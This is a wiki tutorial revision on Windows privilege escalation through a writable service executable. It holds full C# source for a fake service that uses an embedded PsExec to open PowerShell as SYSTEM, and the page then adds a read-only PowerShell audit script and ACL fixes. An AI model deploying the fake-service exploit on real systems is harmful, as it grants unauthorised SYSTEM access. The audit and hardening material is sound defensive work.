Privilege escalation: difference between revisions
From Banane Atomic
(5 intermediate revisions by the same user not shown)
= [https://blog.didierstevens.com/2017/09/05/abusing-a-writable-windows-service/ With a writable Windows service] =
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
<filebox fn='FakeService.cs'>
using System;
using System.Diagnostics;
using System.IO;
using System.ServiceProcess;
using System.Threading;

public class FakeService : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        Thread.Sleep(10000); // wait 10 s for the user to log on and Windows to finish starting
        var psExecPath = ExtractPsExec(); // write the embedded PsExec64.exe to disk
        var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";
        // Windows services run in session 0 while the logged-on user runs in session 1:
        // use Sysinternals' PsExec to start PowerShell interactively in session 1.
        Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
        // stop the service after 1 s; Stop() is called from another thread so OnStart can return
        Thread.Sleep(1000);
        new Thread(() => this.Stop()).Start();
    }

    private string ExtractPsExec()
    {
        // temp path of a service running as SYSTEM: C:\Windows\Temp
        var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe");
        if (!File.Exists(psExecPath))
            File.WriteAllBytes(psExecPath, Resources.PsExec64); // PsExec64.exe embedded as a project resource
        return psExecPath;
    }
}
</filebox>
<filebox fn='Program.cs'>
using System.ServiceProcess;

class Program
{
    static void Main(string[] args)
    {
        // hand the service over to the Service Control Manager
        ServiceBase.Run(new ServiceBase[] { new FakeService() });
    }
}
</filebox>
# Replace the executable of the Windows service by the compiled application.
# A command prompt will be launched when the Windows service starts.
<kode lang='dos'>
whoami
REM nt authority\system
</kode>
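The weakness described above is easy to audit from the administrator's side. The following PowerShell script is an added example (it is not part of the wiki page or of Didier Stevens' post): it walks every installed service, extracts the path of its binary and reports those whose file can be written, modified or fully controlled by a low-privileged principal. It matches principals by well-known SID rather than by name so that it also works on a localized Windows where "Everyone" is displayed as "Tout le monde". It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows and is best run elevated so that every service binary's DACL can be read; it only reads ACLs and changes nothing.

```powershell
# Added audit example (not from the wiki page): list Windows services whose binary
# can be modified by low-privileged principals. Read-only: it only inspects ACLs.
# Assumption: Windows PowerShell 5.1 / PowerShell 7 on Windows, ideally elevated.

# Well-known SIDs, so the check also works on localized Windows (e.g. "Tout le monde").
$lowPrivSids = @(
    'S-1-1-0',      # Everyone
    'S-1-5-32-545', # BUILTIN\Users
    'S-1-5-11',     # Authenticated Users
    'S-1-5-4'       # INTERACTIVE
)

# Any of these rights lets the principal replace or alter the file contents.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted ("C:\x y\svc.exe" -arg), unquoted with spaces, or use %SystemRoot%.
    $expanded = [Environment]::ExpandEnvironmentVariables($PathName)
    if ($expanded -match '^"([^"]+)"') { return $Matches[1] }
    if ($expanded -match '^(.+?\.exe)\b') { return $Matches[1] }
    return ($expanded -split ' ')[0]
}

function Get-LowPrivWriteAce {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # unresolvable account: skip it
        if ($lowPrivSids -notcontains $sid) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $ace }
    }
    return $null
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
    $ace = Get-LowPrivWriteAce $exe
    if ($ace) {
        [pscustomobject]@{
            Service   = $svc.Name
            RunsAs    = $svc.StartName      # 'LocalSystem' is the case the page describes
            Binary    = $exe
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
        }
    }
}
$findings | Format-Table -AutoSize
```

Every reported line is a service that a standard user could hijack exactly as described above; the fix is to remove the offending ACE from the binary (for instance with icacls, `icacls "<path to service exe>" /remove:g Users`, the path being a placeholder) or to move the binary under a directory whose DACL is restricted to administrators. The script checks the file only: a writable parent directory, or an unquoted path containing spaces, gives the same result and deserves a second pass over the directories.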
Latest revision as of 20 February 2022, 16:07